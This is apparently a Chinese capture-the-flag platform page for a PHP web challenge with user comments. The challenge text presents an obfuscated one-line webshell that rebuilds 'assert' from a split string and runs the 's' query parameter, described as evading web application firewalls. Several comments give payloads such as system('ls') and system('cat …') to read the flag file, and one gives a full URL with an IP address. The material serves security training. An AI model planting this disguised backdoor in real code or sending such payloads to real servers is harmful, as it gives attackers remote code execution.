shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8962
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
wangsir 19天前

得到assert($_GET['s']),对s赋值找到flag文件

回复 0

聪仔草莓51 1月前

源码将字符串 a#s#s#e#r#t 按分隔符拆分后重新拼接成函数名 assert,并调用 assert(传入参数)。该函数在旧版本 PHP 中会把传入字符串当作代码执行,因此构造参数即可执行任意 PHP 代码。 利用方式:传入列目录的参数找到 flag 文件名,再传入读取文件的参数获取内容,即可得到本题答案。

回复 0

西红柿dun牛腩 1月前

这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材

回复 1

yiqie 1月前

flag{**********}

回复 0

icyskin 1月前

http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

ggsea 2月前

列出当前目录:?s=print_r(scandir('./')),看到flag.txt

回复 0

lawrencekz 3月前

flag{******}

回复 0

hwx 3月前

直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg

回复 3

b2026tf 4月前

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0

syhaisy 4月前

20702af5309ab1f70e0f7e8a81076a4e

回复 0

WriteUp

image
harry

3 金币

评分(11)

解题动态

香克斯呀 攻破了该题 30分钟前
真打不动了 攻破了该题 8小时前
asdadas 攻破了该题 18小时前
16suiTDT 攻破了该题 19小时前
Zfc 攻破了该题 23小时前
Dal. 攻破了该题 23小时前
hhh小白 攻破了该题 1天前
Aosi 攻破了该题 1天前
15356624960 攻破了该题 1天前
秋叶沙沙 攻破了该题 2天前
小白d 攻破了该题 2天前
YIJIE 攻破了该题 2天前
isright 攻破了该题 3天前
suyifeim4 攻破了该题 3天前
Macolm 攻破了该题 3天前
cxkkammt 攻破了该题 3天前
wangyc 攻破了该题 3天前
hzydy0_0 攻破了该题 3天前
ABinsec 攻破了该题 3天前
J01h 攻破了该题 3天前
问题反馈